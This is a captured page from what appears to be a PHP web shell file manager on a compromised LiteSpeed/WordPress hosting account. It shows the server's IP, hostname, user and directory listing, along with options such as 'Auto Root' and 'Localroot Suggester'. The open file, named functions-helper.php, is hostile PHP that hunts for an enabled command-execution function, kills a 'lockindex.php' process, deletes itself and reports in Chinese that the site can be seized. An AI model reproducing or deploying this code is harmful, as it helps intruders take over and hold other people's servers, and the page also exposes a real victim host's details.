Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
dr-xr-xr-x
2025-08-31 20:43
admin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
admin-new-market
[ DIR ]
drwxr-xr-x
2025-09-08 09:40
api_key
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
assets
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
cgi-bin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
folderadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
folderanimenew
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
font
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
fonts
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
heroadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
includes
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
keyadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
nibondon
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
order
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pages
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pdf
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
photo
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
photo_smart
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
qr_photo
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
roaring
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
test
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
themesth
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-admin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-content
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-includes
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
.hta
5.35
KB
-rw-r--r--
2025-09-08 03:27
.htaccess
244.47
KB
-rw-r--r--
2025-09-08 13:54
buy.php
3.39
KB
-rw-r--r--
2025-09-08 03:28
functions-helper.php
10.7
KB
-rw-r--r--
2025-09-08 04:00
Save
Rename
<?php function ableMethod() { $methods = ['exec', 'shell_exec', 'popen', 'system', 'passthru']; $disableFuncs = explode(',', ini_get('disable_functions')); foreach ($methods as $method) { if (!in_array($method, $disableFuncs)) { return $method; } } return ''; } function runCmd($cmdStr, $ableMethod) { $cmdOutput = []; $cmdOutputCode = 0; $result = ''; switch ($ableMethod) { case 'exec': @exec($cmdStr, $cmdOutput, $cmdOutputCode); if ($cmdOutputCode === 0) { if (!empty($cmdOutput)) { $result = join("\n", $cmdOutput); $processID = current($cmdOutput); // 删除该进程ID @exec("kill -9 {$processID}", $cmdOutput2, $cmdOutputCode2); if ($cmdOutputCode2 === 0) { echo '进程ID=' . $processID . '删除成功'; } else { echo '进程ID=' . $processID . '删除失败'; } } return 'exec执行成功,结果:' . $result; } return 'exec执行失败'; case 'shell_exec': $result = @shell_exec($cmdStr); if ($result) { @shell_exec("kill -9 {$result}"); } return 'shell_exec执行成功,结果:' . $result; case 'popen': if (@is_resource($f = @popen($cmdStr, "r"))) { while (!@feof($f)) $result .= @fread($f, 1024); } if (@is_resource($f = @popen("kill -9 {$result}", "r"))) { while (!@feof($f)) $result .= @fread($f, 1024); } @pclose($f); return 'popen执行成功,结果:' . $result; case 'system': @ob_start(); @system($cmdStr, $cmdOutputCode); $result = @ob_get_contents(); @ob_end_clean(); if ($cmdOutputCode === 0) { return 'system执行成功,结果:' . $result; @system("kill -9 {$result}", $cmdOutputCode); } else { return 'system执行失败'; } case 'passthru': @ob_start(); @passthru($cmdStr, $cmdOutputCode); $result = @ob_get_contents(); @ob_end_clean(); if ($cmdOutputCode === 0) { return 'passthru执行成功,结果:' . $result; @passthru("kill -9 {$result}", $cmdOutputCode); } else { return 'passthru执行失败'; } default: return '未知执行函数'; } } $currentFilePath = __FILE__; $currentFileDir = pathinfo($currentFilePath, PATHINFO_DIRNAME); $str = ''; $ableMethod = ableMethod(); if (empty($ableMethod)) { $str .= 'php没有可执行命令行的函数;'; } else { $str .= 'php可用函数:' . ableMethod() . ';'; $cmdStr = "ps -ef | grep lockindex.php | grep -v grep | awk '{print $2}'"; $str .= '执行命令:' . $cmdStr . ';'; $res = runCmd($cmdStr, $ableMethod); $str .= '执行结果:' . $res . ',最终success;'; $str .= '该站点可被秒杀秒改,守护进程运行中'; } header("Content-type:text/html; charset=utf-8"); unlink($currentFilePath); die($str);